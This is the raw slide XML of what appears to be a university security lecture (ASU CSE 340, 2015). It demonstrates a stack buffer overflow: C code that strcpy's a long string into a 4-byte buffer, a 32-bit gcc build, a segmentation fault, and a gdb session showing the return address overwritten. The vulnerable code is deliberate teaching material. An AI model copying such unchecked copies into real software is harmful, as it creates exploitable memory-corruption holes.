                        <a:t> (0x20757361)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10009"/>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0"/>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1"/>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2"/>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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10014"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x8048504</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10015"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301752">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2ac</a:t>
                      </a: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163</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0xfd2ac</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0xfd2c0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x6c6c6166</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="338328">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>%</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x31303220</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mycpy</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0x80483f4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483f5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483f7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048401</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048404</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048407</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="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0x804840e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048414</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048417</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048423</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048428</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048430</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048435</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="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511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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="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81886053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5464070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">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mycpy</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char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</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char</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foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[4];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strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(foo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="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a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a: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printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("After");   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"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164</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4289989" y="29782"/>
            <a:ext cx="4495088"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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -Wall -m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>overflow_example.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="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a.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> Segmentation fault (core dumped)</a:t>
            </a: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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="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gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Starting program: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="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Program received signal SIGSEGV, Segmentation fault.0x31303220 in ?? ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>registers</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0xffffd1fc  -11780</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x0	        0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x8048521	 134513953</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x908ff4	 9474036</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
